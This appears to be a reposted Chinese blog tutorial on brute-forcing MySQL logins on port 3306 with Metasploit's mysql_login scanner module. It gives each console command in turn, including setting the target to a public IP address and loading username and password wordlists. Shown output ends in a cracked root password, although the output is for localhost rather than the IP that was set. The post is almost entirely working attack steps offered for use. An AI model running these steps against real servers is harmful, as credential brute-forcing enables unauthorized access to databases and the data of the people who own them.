zoukankan      html  css  js  c++  java
  • msf mysql port:3306

    1. nmap扫出3306端口的话,就往下;

    2. 搜索漏洞

    msf > search  mysql_login
    
    1. 使用该漏洞
    msf > use auxiliary/scanner/mysql/mysql_login
    
    1. 查看该漏洞用法
    msf auxiliary(mysql_login) > show options
    
    1. 向rhosts输入ip,看到可以正常访问mysql
    msf auxiliary(mysql_login) > set rhosts 121.42.27.192
    
    1. 找一个测试爆破的用户名字典和密码字典进行爆破
    msf auxiliary(mysql_login) > set user_file  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  
    
    msf auxiliary(mysql_login) > set pass_file   /usr/share/sparta/wordlists/mysql-default-userpass.txt  
    
    1. run
    msf auxiliary(mysql_login) > run
    
    # 运行可以查看到mysql版本为 MySQL version 5.7.29
    [+] 127.0.0.1:3306        - 127.0.0.1:3306 - Found remote MySQL version 5.7.29
    [-] 127.0.0.1:3306        - 127.0.0.1:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'localhost' (using password: NO))
    ......
    [-] 127.0.0.1:3306        - 127.0.0.1:3306 - LOGIN FAILED: root:111 (Incorrect: Access denied for user 'root'@'localhost' (using password: YES))
    [+] 127.0.0.1:3306        - 127.0.0.1:3306 - Success: 'root:12345678'
    [*] 127.0.0.1:3306        - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    # 看到绿色加号[+] 即为破解成功!
    
  • 相关阅读:
    mvn常用命令
    maven pom.xml解释 (转)
    hibernate的主键生成策略
    软件绿色版和安装版的区别
    spring事务
    JdbcTemplate操作数据库
    控制反转和spring在项目中可以带来的好处
    三种实例化bean的方式
    UVA 1262 Password 暴力枚举
    CSDN2015博客之星评选之拉票环节
  • 原文地址:https://www.cnblogs.com/mysticbinary/p/12762917.html
Copyright © 2011-2022 走看看